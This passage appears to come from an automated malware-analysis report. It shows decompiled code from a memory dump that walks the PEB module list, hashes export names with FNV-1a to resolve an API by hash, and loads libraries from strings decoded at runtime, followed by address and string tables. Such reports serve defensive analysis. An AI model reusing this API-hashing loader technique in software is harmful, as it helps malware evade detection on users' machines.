						_v544 = _v108 +  *((intOrPtr*)(_v108 + 0x3c));
						_t1468 = _v544;
						_v1120 =  *((intOrPtr*)(_t1468 + 0x78));
						_v1116 =  *((intOrPtr*)(_t1468 + 0x7c));
						_v180 = _v108 + _v1120;
						_v176 = _v1116;
						if(_v180 == _v184) {
							_v468 = 0;
						} else {
							_v468 = 1;
						}
						_v20 = _v468;
						if((_v20 & 0x000000ff) != 0) {
							_v68 =  *((intOrPtr*)(_v180 + 0x18));
							while(1) {
								_v548 = _v68;
								_v68 = _v68 - 1;
								if(_v548 == 0) {
									goto L34;
								}
								_v552 = _v184 +  *((intOrPtr*)(_v184 +  *((intOrPtr*)(_v180 + 0x20)) + _v68 * 4));
								_v376 = _v552;
								_v380 = 0x811c9dc5;
								while(1) {
									_v21 =  *_v376;
									_v376 = _v376 + 1;
									_v6 = _v21;
									if(_v6 == 0) {
										break;
									}
									_v380 = (_v6 ^ _v380) * 0x1000193;
								}
								_v556 = _v380;
								if(_v556 != 0xe463da3c) {
									continue;
								} else {
									_v564 = _v184 +  *((intOrPtr*)(_v180 + 0x1c));
									_v560 = _v184 +  *((intOrPtr*)(_v180 + 0x24));
									_v568 = _v184 +  *((intOrPtr*)(_v564 + ( *(_v560 + _v68 * 2) & 0x0000ffff) * 4));
									_v388 = _v568;
								}
								goto L36;
							}
						}
						goto L34;
						L36:
						_v584 =  &_v580;
						_v588 =  *_v584;
						_v592 = _v388(_v588);
						if(_v592 == 0) {
							_v23 = 0;
							_t1407 = E6E411FF0(L"KERNEL32.dll", 0); // executed
							_v600 = _t1407;
							_v472 = E6E414D30( &_v23);
							E6E41F7B0(_v472);
							_v596 = _v472;
							LoadLibraryA(_v596);
						}
						_v24 = 0;
						_v476 = E6E413560( &_v24);
						E6E41F570(_v476);
						_v652 = _v476;
						_v260 = _v1224;
						_v604 =  *[fs:0x30];
						_v608 =  *((intOrPtr*)(_v604 + 0xc));
						_v612 =  *((intOrPtr*)(_v608 + 0xc));
						_v256 = _v612;
						do {
							_v112 =  *((intOrPtr*)(_v256 + 0x18));
							_v196 = _v112;
							_v616 = _v112 +  *((intOrPtr*)(_v112 + 0x3c));
							_t1483 = _v616;
							_v1128 =  *((intOrPtr*)(_t1483 + 0x78));
							_v1124 =  *((intOrPtr*)(_t1483 + 0x7c));
							_v192 = _v112 + _v1128;
							_v188 = _v1124;
							if(_v192 == _v196) {
								_v480 = 0;
							} else {
								_v480 = 1;
							}
							_v25 = _v480;
							if((_v25 & 0x000000ff) != 0) {
								_v72 =  *((intOrPtr*)(_v192 + 0x18));
								while(1) {
									_v620 = _v72;
									_v72 = _v72 - 1;
									if(_v620 == 0) {
										goto L52;
									}
									_v624 = _v196 +  *((intOrPtr*)(_v196 +  *((intOrPtr*)(_v192 + 0x20)) + _v72 * 4));
									_v248 = _v624;
									_v252 = 0x811c9dc5;
									while(1) {
										_v26 =  *_v248;
										_v248 = _v248 + 1;
										_v7 = _v26;
										if(_v7 == 0) {
											break;
										}
										_v252 = (_v7 ^ _v252) * 0x1000193;
									}
									_v628 = _v252;
									if(_v628 != 0xe463da3c) {
										continue;
									} else {
										_v636 = _v196 +  *((intOrPtr*)(_v192 + 0x1c));
										_v632 = _v196 +  *((intOrPtr*)(_v192 + 0x24));
										_v640 = _v196 +  *((intOrPtr*)(_v636 + ( *(_v632 + _v72 * 2) & 0x0000ffff) * 4));
										_v260 = _v640;
									}
									goto L54;
								}
							}
							goto L52;
							L54:
							_v656 =  &_v652;
							_v660 =  *_v656;
							_v664 = _v260(_v660);
							if(_v664 == 0) {
								_v28 = 0;
								_v672 = E6E411FF0(L"KERNEL32.dll", 0);
								_v484 = E6E414820( &_v28);
								E6E41F530(_v484);
								_v668 = _v484;
								LoadLibraryA(_v668);
							}
							_v29 = 0;
							_v488 = E6E413B60( &_v29);
							E6E41F5F0(_v488);
							_v724 = _v488;
							_v276 = _v1228;
							_v676 =  *[fs:0x30];
							_v680 =  *((intOrPtr*)(_v676 + 0xc));
							_v684 =  *((intOrPtr*)(_v680 + 0xc));
							_v272 = _v684;
							do {
								_v116 =  *((intOrPtr*)(_v272 + 0x18));
								_v208 = _v116;
								_v688 = _v116 +  *((intOrPtr*)(_v116 + 0x3c));
								_t1498 = _v688;
								_v1136 =  *((intOrPtr*)(_t1498 + 0x78));
								_v1132 =  *((intOrPtr*)(_t1498 + 0x7c));
								_v204 = _v116 + _v1136;
								_v200 = _v1132;
								if(_v204 == _v208) {
									_v392 = 0;
								} else {
									_v392 = 1;
								}
								_v30 = _v392;
								if((_v30 & 0x000000ff) != 0) {
									_v76 =  *((intOrPtr*)(_v204 + 0x18));
									while(1) {
										_v692 = _v76;
										_v76 = _v76 - 1;
										if(_v692 == 0) {
											goto L70;
										}
										_v696 = _v208 +  *((intOrPtr*)(_v208 +  *((intOrPtr*)(_v204 + 0x20)) + _v76 * 4));
										_v264 = _v696;
										_v268 = 0x811c9dc5;
										while(1) {
											_v31 =  *_v264;
											_v264 = _v264 + 1;
											_v8 = _v31;
											if(_v8 == 0) {
												break;
											}
											_v268 = (_v8 ^ _v268) * 0x1000193;
										}
										_v700 = _v268;
										if(_v700 != 0xe463da3c) {
											continue;
										} else {
											_v708 = _v208 +  *((intOrPtr*)(_v204 + 0x1c));
											_v704 = _v208 +  *((intOrPtr*)(_v204 + 0x24));
											_v712 = _v208 +  *((intOrPtr*)(_v708 + ( *(_v704 + _v76 * 2) & 0x0000ffff) * 4));
											_v276 = _v712;
										}
										goto L72;
									}
								}
								goto L70;
								L72:
								_v728 =  &_v724;
								_v732 =  *_v728;
								_v736 = _v276(_v732);
								if(_v736 == 0) {
									_v33 = 0;
									_v744 = E6E411FF0(L"KERNEL32.dll", 0);
									_v396 = E6E412D00( &_v33);
									E6E41F6B0(_v396);
									_v740 = _v396;
									_v744(_v740);
								}
								_v34 = 0;
								_v400 = E6E412AA0( &_v34);
								E6E41F630(_v400);
								_v796 = _v400;
								_v292 = _v1232;
								_v748 =  *[fs:0x30];
								_v752 =  *((intOrPtr*)(_v748 + 0xc));
								_v756 =  *((intOrPtr*)(_v752 + 0xc));
								_v288 = _v756;
								do {
									_v120 =  *((intOrPtr*)(_v288 + 0x18));
									_v220 = _v120;
									_v760 = _v120 +  *((intOrPtr*)(_v120 + 0x3c));
									_t1513 = _v760;
									_v1144 =  *((intOrPtr*)(_t1513 + 0x78));
									_v1140 =  *((intOrPtr*)(_t1513 + 0x7c));
									_v216 = _v120 + _v1144;
									_v212 = _v1140;
									if(_v216 == _v220) {
										_v404 = 0;
									} else {
										_v404 = 1;
									}
									_v35 = _v404;
									if((_v35 & 0x000000ff) != 0) {
										_v80 =  *((intOrPtr*)(_v216 + 0x18));
										while(1) {
											_v764 = _v80;
											_v80 = _v80 - 1;
											if(_v764 == 0) {
												goto L88;
											}
											_v768 = _v220 +  *((intOrPtr*)(_v220 +  *((intOrPtr*)(_v216 + 0x20)) + _v80 * 4));
											_v280 = _v768;
											_v284 = 0x811c9dc5;
											while(1) {
												_v36 =  *_v280;
												_v280 = _v280 + 1;
												_v9 = _v36;
												if(_v9 == 0) {
													break;
												}
												_v284 = (_v9 ^ _v284) * 0x1000193;
											}
											_v772 = _v284;
											if(_v772 != 0xe463da3c) {
												continue;
											} else {
												_v780 = _v220 +  *((intOrPtr*)(_v216 + 0x1c));
												_v776 = _v220 +  *((intOrPtr*)(_v216 + 0x24));
												_v784 = _v220 +  *((intOrPtr*)(_v780 + ( *(_v776 + _v80 * 2) & 0x0000ffff) * 4));
												_v292 = _v784;
											}
											goto L90;
										}
									}
									goto L88;
									L90:
									_v800 =  &_v796;
									_v804 =  *_v800;
									_v808 = _v292(_v804);
									if(_v808 == 0) {
										_v38 = 0;
										_v816 = E6E411FF0(L"KERNEL32.dll", 0);
										_v408 = E6E413470( &_v38);
										E6E41F6F0(_v408);
										_v812 = _v408;
										_v816(_v812);
									}
									_v39 = 0;
									_v412 = E6E413D40( &_v39);
									E6E41F4F0(_v412);
									_v868 = _v412;
									_v308 = _v1236;
									_v820 =  *[fs:0x30];
									_v824 =  *((intOrPtr*)(_v820 + 0xc));
									_v828 =  *((intOrPtr*)(_v824 + 0xc));
									_v304 = _v828;
									do {
										_v124 =  *((intOrPtr*)(_v304 + 0x18));
										_v232 = _v124;
										_v832 = _v124 +  *((intOrPtr*)(_v124 + 0x3c));
										_t1528 = _v832;
										_v1152 =  *((intOrPtr*)(_t1528 + 0x78));
										_v1148 =  *((intOrPtr*)(_t1528 + 0x7c));
										_v228 = _v124 + _v1152;
										_v224 = _v1148;
										if(_v228 == _v232) {
											_v416 = 0;
										} else {
											_v416 = 1;
										}
										_v40 = _v416;
										if((_v40 & 0x000000ff) != 0) {
											_v84 =  *((intOrPtr*)(_v228 + 0x18));
											while(1) {
												_v836 = _v84;
												_v84 = _v84 - 1;
												if(_v836 == 0) {
													goto L106;
												}
												_v840 = _v232 +  *((intOrPtr*)(_v232 +  *((intOrPtr*)(_v228 + 0x20)) + _v84 * 4));
												_v296 = _v840;
												_v300 = 0x811c9dc5;
												while(1) {
													_v41 =  *_v296;
													_v296 = _v296 + 1;
													_v10 = _v41;
													if(_v10 == 0) {
														break;
													}
													_v300 = (_v10 ^ _v300) * 0x1000193;
												}
												_v844 = _v300;
												if(_v844 != 0xe463da3c) {
													continue;
												} else {
													_v852 = _v232 +  *((intOrPtr*)(_v228 + 0x1c));
													_v848 = _v232 +  *((intOrPtr*)(_v228 + 0x24));
													_v856 = _v232 +  *((intOrPtr*)(_v852 + ( *(_v848 + _v84 * 2) & 0x0000ffff) * 4));
													_v308 = _v856;
												}
												goto L108;
											}
										}
										goto L106;
										L108:
										_v872 =  &_v868;
										_v876 =  *_v872;
										_v880 = _v308(_v876);
										if(_v880 == 0) {
											_v43 = 0;
											_v888 = E6E411FF0(L"Kernel32.dll", 0);
											_v492 = E6E412FD0( &_v43);
											E6E41F5B0(_v492);
											_v884 = _v492;
											_v888(_v884);
										}
										_v44 = 0;
										_v424 = E6E4129B0( &_v44);
										E6E41F7F0(_v424);
										_v940 = _v424;
										_v324 = _v1240;
										_v1052 =  *[fs:0x30];
										_v896 =  *((intOrPtr*)(_v1052 + 0xc));
										_v900 =  *((intOrPtr*)(_v896 + 0xc));
										_v320 = _v900;
										do {
											_v128 =  *((intOrPtr*)(_v320 + 0x18));
											_v244 = _v128;
											_v904 = _v128 +  *((intOrPtr*)(_v128 + 0x3c));
											_t1543 = _v904;
											_v1160 =  *((intOrPtr*)(_t1543 + 0x78));
											_v1156 =  *((intOrPtr*)(_t1543 + 0x7c));
											_v240 = _v128 + _v1160;
											_v236 = _v1156;
											if(_v240 == _v244) {
												_v460 = 0;
											} else {
												_v460 = 1;
											}
											_v45 = _v460;
											if((_v45 & 0x000000ff) != 0) {
												_v88 =  *((intOrPtr*)(_v240 + 0x18));
												while(1) {
													_v908 = _v88;
													_v88 = _v88 - 1;
													if(_v908 == 0) {
														goto L124;
													}
													_v912 = _v244 +  *((intOrPtr*)(_v244 +  *((intOrPtr*)(_v240 + 0x20)) + _v88 * 4));
													_v312 = _v912;
													_v316 = 0x811c9dc5;
													while(1) {
														_v46 =  *_v312;
														_v312 = _v312 + 1;
														_v11 = _v46;
														if(_v11 == 0) {
															break;
														}
														_v316 = (_v11 ^ _v316) * 0x1000193;
													}
													_v916 = _v316;
													if(_v916 != 0xe463da3c) {
														continue;
													} else {
														_v924 = _v244 +  *((intOrPtr*)(_v240 + 0x1c));
														_v920 = _v244 +  *((intOrPtr*)(_v240 + 0x24));
														_v928 = _v244 +  *((intOrPtr*)(_v924 + ( *(_v920 + _v88 * 2) & 0x0000ffff) * 4));
														_v324 = _v928;
													}
													goto L126;
												}
											}
											goto L124;
											L126:
											_v944 =  &_v940;
											_v948 =  *_v944;
											_v952 = _v324(_v948);
											if(_v952 == 0) {
												_v48 = 0;
												_v960 = E6E411FF0(L"Kernel32.dll", 0);
												_v432 = E6E4130B0( &_v48);
												E6E41F770(_v432);
												_v956 = _v432;
												LoadLibraryA(_v956);
											}
											_v49 = 0;
											_v436 = E6E4151B0( &_v49);
											E6E41F470(_v436);
											_v1012 = _v436;
											_v340 = _v1244;
											_v964 =  *[fs:0x30];
											_v968 =  *((intOrPtr*)(_v964 + 0xc));
											_v972 =  *((intOrPtr*)(_v968 + 0xc));
											_v336 = _v972;
											do {
												_v132 =  *((intOrPtr*)(_v336 + 0x18));
												_v148 = _v132;
												_v976 = _v132 +  *((intOrPtr*)(_v132 + 0x3c));
												_t1558 = _v976;
												_v1168 =  *((intOrPtr*)(_t1558 + 0x78));
												_v1164 =  *((intOrPtr*)(_t1558 + 0x7c));
												_v144 = _v132 + _v1168;
												_v140 = _v1164;
												if(_v144 == _v148) {
													_v440 = 0;
												} else {
													_v440 = 1;
												}
												_v50 = _v440;
												if((_v50 & 0x000000ff) != 0) {
													_v92 =  *((intOrPtr*)(_v144 + 0x18));
													while(1) {
														_v980 = _v92;
														_v92 = _v92 - 1;
														if(_v980 == 0) {
															goto L142;
														}
														_v984 = _v148 +  *((intOrPtr*)(_v148 +  *((intOrPtr*)(_v144 + 0x20)) + _v92 * 4));
														_v328 = _v984;
														_v332 = 0x811c9dc5;
														while(1) {
															_v51 =  *_v328;
															_v328 = _v328 + 1;
															_v12 = _v51;
															if(_v12 == 0) {
																break;
															}
															_v332 = (_v12 ^ _v332) * 0x1000193;
														}
														_v988 = _v332;
														if(_v988 != 0xe463da3c) {
															continue;
														} else {
															_v996 = _v148 +  *((intOrPtr*)(_v144 + 0x1c));
															_v992 = _v148 +  *((intOrPtr*)(_v144 + 0x24));
															_v1000 = _v148 +  *((intOrPtr*)(_v996 + ( *(_v992 + _v92 * 2) & 0x0000ffff) * 4));
															_v340 = _v1000;
														}
														goto L144;
													}
												}
												goto L142;
												L144:
												_v1016 =  &_v1012;
												_v1020 =  *_v1016;
												_v1024 = _v340(_v1020);
												if(_v1024 == 0) {
													_v53 = 0;
													_v1032 = E6E411FF0(L"Kernel32.dll", 0);
													_v444 = E6E412B90( &_v53);
													E6E41F4B0(_v444);
													_v1028 = _v444;
													_v1032(_v1028);
												}
												_v54 = 0;
												_v448 = E6E413C50( &_v54);
												E6E41F8B0(_v448);
												_v1084 = _v448;
												_v352 = _v1248;
												_v1036 =  *[fs:0x30];
												_v1040 =  *((intOrPtr*)(_v1036 + 0xc));
												_v1044 =  *((intOrPtr*)(_v1040 + 0xc));
												_v356 = _v1044;
												do {
													_v136 =  *((intOrPtr*)(_v356 + 0x18));
													_v160 = _v136;
													_v1048 = _v136 +  *((intOrPtr*)(_v136 + 0x3c));
													_t1573 = _v1048;
													_v1176 =  *((intOrPtr*)(_t1573 + 0x78));
													_v1172 =  *((intOrPtr*)(_t1573 + 0x7c));
													_v156 = _v136 + _v1176;
													_v152 = _v1172;
													if(_v156 == _v160) {
														_v452 = 0;
													} else {
														_v452 = 1;
													}
													_v55 = _v452;
													if((_v55 & 0x000000ff) != 0) {
														_v96 =  *((intOrPtr*)(_v156 + 0x18));
														while(1) {
															_v1212 = _v96;
															_v96 = _v96 - 1;
															if(_v1212 == 0) {
																goto L160;
															}
															_v1056 = _v160 +  *((intOrPtr*)(_v160 +  *((intOrPtr*)(_v156 + 0x20)) + _v96 * 4));
															_v344 = _v1056;
															_v348 = 0x811c9dc5;
															while(1) {
																_v56 =  *_v344;
																_v344 = _v344 + 1;
																_v13 = _v56;
																if(_v13 == 0) {
																	break;
																}
																_v348 = (_v13 ^ _v348) * 0x1000193;
															}
															_v1060 = _v348;
															if(_v1060 != 0xe463da3c) {
																continue;
															} else {
																_v1068 = _v160 +  *((intOrPtr*)(_v156 + 0x1c));
																_v1064 = _v160 +  *((intOrPtr*)(_v156 + 0x24));
																_v1072 = _v160 +  *((intOrPtr*)(_v1068 + ( *(_v1064 + _v96 * 2) & 0x0000ffff) * 4));
																_v352 = _v1072;
															}
															goto L162;
														}
													}
													goto L160;
													L162:
													_v1088 =  &_v1084;
													_v1092 =  *_v1088;
													_v1096 = _v352(_v1092);
													if(_v1096 == 0) {
														_v58 = 0;
														_v1104 = E6E411FF0(L"Kernel32.dll", 0);
														_v456 = E6E412100( &_v58);
														E6E41F830(_v456);
														_v1100 = _v456;
														_v1104(_v1100);
													}
													return 1;
													L160:
													_v1076 = _v356;
													_v1080 =  *_v1076;
													_v356 = _v1080;
													_v57 = 1;
												} while ((_v57 & 0x000000ff) != 0);
												_v352 = 0;
												goto L162;
												L142:
												_v1004 = _v336;
												_v1008 =  *_v1004;
												_v336 = _v1008;
												_v52 = 1;
											} while ((_v52 & 0x000000ff) != 0);
											_v340 = 0;
											goto L144;
											L124:
											_v932 = _v320;
											_v936 =  *_v932;
											_v320 = _v936;
											_v47 = 1;
										} while ((_v47 & 0x000000ff) != 0);
										_v324 = 0;
										goto L126;
										L106:
										_v860 = _v304;
										_v864 =  *_v860;
										_v304 = _v864;
										_v42 = 1;
									} while ((_v42 & 0x000000ff) != 0);
									_v308 = 0;
									goto L108;
									L88:
									_v788 = _v288;
									_v792 =  *_v788;
									_v288 = _v792;
									_v37 = 1;
								} while ((_v37 & 0x000000ff) != 0);
								_v292 = 0;
								goto L90;
								L70:
								_v716 = _v272;
								_v720 =  *_v716;
								_v272 = _v720;
								_v32 = 1;
							} while ((_v32 & 0x000000ff) != 0);
							_v276 = 0;
							goto L72;
							L52:
							_v644 = _v256;
							_v648 =  *_v644;
							_v256 = _v648;
							_v27 = 1;
						} while ((_v27 & 0x000000ff) != 0);
						_v260 = 0;
						goto L54;
						L34:
						_v572 = _v384;
						_v576 =  *_v572;
						_v384 = _v576;
						_v22 = 1;
					} while ((_v22 & 0x000000ff) != 0);
					_v388 = 0;
					goto L36;
					L16:
					_v500 = _v368;
					_v504 =  *_v500;
					_v368 = _v504;
					_v17 = 1;
				} while ((_v17 & 0x000000ff) != 0);
				_v372 = 0;
				goto L18;
			}

0x6e4168eb
0x6e4168f6
0x6e416902
0x6e416916
0x6e41691e
0x6e41691e
0x6e416925
0x6e416931
0x6e41693e
0x6e41694d
0x6e41695c
0x6e416968
0x6e41696e
0x6e416977
0x6e41697d
0x6e41698c
0x6e41699a
0x6e4169a8
0x6e4169ae
0x6e4169bd
0x6e4169c9
0x6e4169db
0x6e4169e9
0x6e4169dd
0x6e4169dd
0x6e4169dd
0x6e4169f9
0x6e416a02
0x6e416a11
0x6e416a14
0x6e416a17
0x6e416a23
0x6e416a2d
0x00000000
0x00000000
0x6e416a4e
0x6e416a5a
0x6e416a60
0x6e416a6a
0x6e416a72
0x6e416a7e
0x6e416a87
0x6e416a90
0x00000000
0x00000000
0x6e416ab1
0x6e416ab1
0x6e416a98
0x6e416ac3
0x00000000
0x6e416ac5
0x6e416ad4
0x6e416ae9
0x6e416b0b
0x6e416b17
0x6e416b17
0x00000000
0x6e416ac3
0x6e416a14
0x00000000
0x6e416b64
0x6e416b6a
0x6e416b78
0x6e416b8b
0x6e416b98
0x6e416b9c
0x6e416bab
0x6e416bb9
0x6e416bc5
0x6e416bd0
0x6e416bdd
0x6e416bdd
0x6e416be5
0x6e416bf0
0x6e416bfc
0x6e416c07
0x6e416c13
0x6e416c1f
0x6e416c2e
0x6e416c3d
0x6e416c49
0x6e416c4f
0x6e416c58
0x6e416c5e
0x6e416c6d
0x6e416c7b
0x6e416c89
0x6e416c8f
0x6e416c9e
0x6e416caa
0x6e416cbc
0x6e416cca
0x6e416cbe
0x6e416cbe
0x6e416cbe
0x6e416cda
0x6e416ce3
0x6e416cf2
0x6e416cf5
0x6e416cf8
0x6e416d04
0x6e416d0e
0x00000000
0x00000000
0x6e416d2f
0x6e416d3b
0x6e416d41
0x6e416d4b
0x6e416d53
0x6e416d5f
0x6e416d68
0x6e416d71
0x00000000
0x00000000
0x6e416d92
0x6e416d92
0x6e416d79
0x6e416da4
0x00000000
0x6e416da6
0x6e416db5
0x6e416dca
0x6e416dec
0x6e416df8
0x6e416df8
0x00000000
0x6e416da4
0x6e416cf5
0x00000000
0x6e416e45
0x6e416e4b
0x6e416e59
0x6e416e6c
0x6e416e79
0x6e416e7d
0x6e416e87
0x6e416e8c
0x6e416e9a
0x6e416ea6
0x6e416eb1
0x6e416ebe
0x6e416ebe
0x6e416ec6
0x6e416ed1
0x6e416edd
0x6e416ee8
0x6e416ef4
0x6e416f00
0x6e416f0f
0x6e416f1e
0x6e416f2a
0x6e416f30
0x6e416f39
0x6e416f3f
0x6e416f4e
0x6e416f5c
0x6e416f6a
0x6e416f70
0x6e416f7f
0x6e416f8b
0x6e416f9d
0x6e416fab
0x6e416f9f
0x6e416f9f
0x6e416f9f
0x6e416fbb
0x6e416fc4
0x6e416fd3
0x6e416fd6
0x6e416fd9
0x6e416fe5
0x6e416fef
0x00000000
0x00000000
0x6e417010
0x6e41701c
0x6e417022
0x6e41702c
0x6e417034
0x6e417040
0x6e417049
0x6e417052
0x00000000
0x00000000
0x6e417073
0x6e417073
0x6e41705a
0x6e417085
0x00000000
0x6e417087
0x6e417096
0x6e4170ab
0x6e4170cd
0x6e4170d9
0x6e4170d9
0x00000000
0x6e417085
0x6e416fd6
0x00000000
0x6e417126
0x6e41712c
0x6e41713a
0x6e41714d
0x6e41715a
0x6e41715e
0x6e41716d
0x6e41717b
0x6e417187
0x6e417192
0x6e41719f
0x6e41719f
0x6e4171a7
0x6e4171b2
0x6e4171be
0x6e4171c9
0x6e4171d5
0x6e4171e1
0x6e4171f0
0x6e4171ff
0x6e41720b
0x6e417211
0x6e41721a
0x6e417220
0x6e41722f
0x6e41723d
0x6e41724b
0x6e417251
0x6e417260
0x6e41726c
0x6e41727e
0x6e41728c
0x6e417280
0x6e417280
0x6e417280
0x6e41729c
0x6e4172a5
0x6e4172b4
0x6e4172b7
0x6e4172ba
0x6e4172c6
0x6e4172d0
0x00000000
0x00000000
0x6e4172f1
0x6e4172fd
0x6e417303
0x6e41730d
0x6e417315
0x6e417321
0x6e41732a
0x6e417333
0x00000000
0x00000000
0x6e417354
0x6e417354
0x6e41733b
0x6e417366
0x00000000
0x6e417368
0x6e417377
0x6e41738c
0x6e4173ae
0x6e4173ba
0x6e4173ba
0x00000000
0x6e417366
0x6e4172b7
0x00000000
0x6e417407
0x6e41740d
0x6e41741b
0x6e41742e
0x6e41743b
0x6e41743f
0x6e41744e
0x6e41745c
0x6e417468
0x6e417473
0x6e417480
0x6e417480
0x6e417488
0x6e417493
0x6e41749f
0x6e4174aa
0x6e4174b6
0x6e4174c2
0x6e4174d1
0x6e4174e0
0x6e4174ec
0x6e4174f2
0x6e4174fb
0x6e417501
0x6e417510
0x6e41751e
0x6e41752c
0x6e417532
0x6e417541
0x6e41754d
0x6e41755f
0x6e41756d
0x6e417561
0x6e417561
0x6e417561
0x6e41757d
0x6e417586
0x6e417595
0x6e417598
0x6e41759b
0x6e4175a7
0x6e4175b1
0x00000000
0x00000000
0x6e4175d2
0x6e4175de
0x6e4175e4
0x6e4175ee
0x6e4175f6
0x6e417602
0x6e41760b
0x6e417614
0x00000000
0x00000000
0x6e417635
0x6e417635
0x6e41761c
0x6e417647
0x00000000
0x6e417649
0x6e417658
0x6e41766d
0x6e41768f
0x6e41769b
0x6e41769b
0x00000000
0x6e417647
0x6e417598
0x00000000
0x6e4176e8
0x6e4176ee
0x6e4176fc
0x6e41770f
0x6e41771c
0x6e417720
0x6e41772f
0x6e41773d
0x6e417749
0x6e417754
0x6e417761
0x6e417761
0x6e417769
0x6e417774
0x6e417780
0x6e41778b
0x6e417797
0x6e4177a3
0x6e4177b2
0x6e4177c1
0x6e4177cd
0x6e4177d3
0x6e4177dc
0x6e4177e2
0x6e4177f1
0x6e4177ff
0x6e41780d
0x6e417813
0x6e417822
0x6e41782e
0x6e417840
0x6e41784e
0x6e417842
0x6e417842
0x6e417842
0x6e41785e
0x6e417867
0x6e417876
0x6e417879
0x6e41787c
0x6e417888
0x6e417892
0x00000000
0x00000000
0x6e4178b3
0x6e4178bf
0x6e4178c5
0x6e4178cf
0x6e4178d7
0x6e4178e3
0x6e4178ec
0x6e4178f5
0x00000000
0x00000000
0x6e417916
0x6e417916
0x6e4178fd
0x6e417928
0x00000000
0x6e41792a
0x6e417939
0x6e41794e
0x6e417970
0x6e41797c
0x6e41797c
0x00000000
0x6e417928
0x6e417879
0x00000000
0x6e4179c9
0x6e4179cf
0x6e4179dd
0x6e4179f0
0x6e4179fd
0x6e417a01
0x6e417a10
0x6e417a1e
0x6e417a2a
0x6e417a35
0x6e417a42
0x6e417a42
0x6e417a4a
0x6e417a55
0x6e417a61
0x6e417a6c
0x6e417a78
0x6e417a84
0x6e417a93
0x6e417aa2
0x6e417aae
0x6e417ab4
0x6e417abd
0x6e417ac3
0x6e417ad2
0x6e417ae0
0x6e417aee
0x6e417af4
0x6e417b03
0x6e417b0f
0x6e417b21
0x6e417b2f
0x6e417b23
0x6e417b23
0x6e417b23
0x6e417b3f
0x6e417b48
0x6e417b57
0x6e417b5a
0x6e417b5d
0x6e417b69
0x6e417b73
0x00000000
0x00000000
0x6e417b94
0x6e417ba0
0x6e417ba6
0x6e417bb0
0x6e417bb8
0x6e417bc4
0x6e417bcd
0x6e417bd6
0x00000000
0x00000000
0x6e417bf7
0x6e417bf7
0x6e417bde
0x6e417c09
0x00000000
0x6e417c0b
0x6e417c1a
0x6e417c2f
0x6e417c51
0x6e417c5d
0x6e417c5d
0x00000000
0x6e417c09
0x6e417b5a
0x00000000
0x6e417caa
0x6e417cb0
0x6e417cbe
0x6e417cd1
0x6e417cde
0x6e417ce2
0x6e417cf1
0x6e417cff
0x6e417d0b
0x6e417d16
0x6e417d23
0x6e417d23
0x6e417d2b
0x6e417d36
0x6e417d42
0x6e417d4d
0x6e417d59
0x6e417d65
0x6e417d74
0x6e417d83
0x6e417d8f
0x6e417d95
0x6e417d9e
0x6e417da4
0x6e417db3
0x6e417dc1
0x6e417dcf
0x6e417dd5
0x6e417de4
0x6e417df0
0x6e417e02
0x6e417e10
0x6e417e04
0x6e417e04
0x6e417e04
0x6e417e20
0x6e417e29
0x6e417e38
0x6e417e3b
0x6e417e3e
0x6e417e4a
0x6e417e54
0x00000000
0x00000000
0x6e417e75
0x6e417e81
0x6e417e87
0x6e417e91
0x6e417e99
0x6e417ea5
0x6e417eae
0x6e417eb7
0x00000000
0x00000000
0x6e417ed8
0x6e417ed8
0x6e417ebf
0x6e417eea
0x00000000
0x6e417eec
0x6e417efb
0x6e417f10
0x6e417f32
0x6e417f3e
0x6e417f3e
0x00000000
0x6e417eea
0x6e417e3b
0x00000000
0x6e417f8b
0x6e417f91
0x6e417f9f
0x6e417fb2
0x6e417fbf
0x6e417fc3
0x6e417fd2
0x6e417fe0
0x6e417fec
0x6e417ff7
0x6e418004
0x6e418004
0x6e41800c
0x6e418017
0x6e418023
0x6e41802e
0x6e41803a
0x6e418046
0x6e418055
0x6e418064
0x6e418070
0x6e418076
0x6e41807f
0x6e41808b
0x6e4180a0
0x6e4180ae
0x6e4180bc
0x6e4180c2
0x6e4180d4
0x6e4180e0
0x6e4180f2
0x6e418100
0x6e4180f4
0x6e4180f4
0x6e4180f4
0x6e418110
0x6e418119
0x6e418128
0x6e41812b
0x6e41812e
0x6e41813a
0x6e418144
0x00000000
0x00000000
0x6e418165
0x6e418171
0x6e418177
0x6e418181
0x6e418189
0x6e418195
0x6e41819e
0x6e4181a7
0x00000000
0x00000000
0x6e4181c8
0x6e4181c8
0x6e4181af
0x6e4181da
0x00000000
0x6e4181dc
0x6e4181eb
0x6e418200
0x6e418222
0x6e41822e
0x6e41822e
0x00000000
0x6e4181da
0x6e41812b
0x00000000
0x6e41827b
0x6e418281
0x6e41828f
0x6e4182a2
0x6e4182af
0x6e4182b3
0x6e4182c2
0x6e4182d0
0x6e4182dc
0x6e4182e7
0x6e4182f4
0x6e4182f4
0x6e4182ff
0x6e41823b
0x6e418241
0x6e41824f
0x6e41825b
0x6e418261
0x6e418269
0x6e418271
0x00000000
0x6e417f4b
0x6e417f51
0x6e417f5f
0x6e417f6b
0x6e417f71
0x6e417f79
0x6e417f81
0x00000000
0x6e417c6a
0x6e417c70
0x6e417c7e
0x6e417c8a
0x6e417c90
0x6e417c98
0x6e417ca0
0x00000000
0x6e417989
0x6e41798f
0x6e41799d
0x6e4179a9
0x6e4179af
0x6e4179b7
0x6e4179bf
0x00000000
0x6e4176a8
0x6e4176ae
0x6e4176bc
0x6e4176c8
0x6e4176ce
0x6e4176d6
0x6e4176de
0x00000000
0x6e4173c7
0x6e4173cd
0x6e4173db
0x6e4173e7
0x6e4173ed
0x6e4173f5
0x6e4173fd
0x00000000
0x6e4170e6
0x6e4170ec
0x6e4170fa
0x6e417106
0x6e41710c
0x6e417114
0x6e41711c
0x00000000
0x6e416e05
0x6e416e0b
0x6e416e19
0x6e416e25
0x6e416e2b
0x6e416e33
0x6e416e3b
0x00000000
0x6e416b24
0x6e416b2a
0x6e416b38
0x6e416b44
0x6e416b4a
0x6e416b52
0x6e416b5a
0x00000000

APIs

Part of subcall function 6E41F3D0: __aullrem.LIBCMT ref: 6E41F412

LoadLibraryA.KERNEL32(?,KERNEL32.dll,00000000), ref: 6E416EBE
LoadLibraryA.KERNEL32(?,KERNEL32.dll,00000000), ref: 6E41719F
LoadLibraryA.KERNEL32(?,Kernel32.dll,00000000), ref: 6E417D23

Strings

Kernel32.dll, xrefs: 6E417A06, 6E417CE7, 6E417FC8, 6E4182B8
KERNEL32.dll, xrefs: 6E416BA1, 6E416E82, 6E417163, 6E417444, 6E417725

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

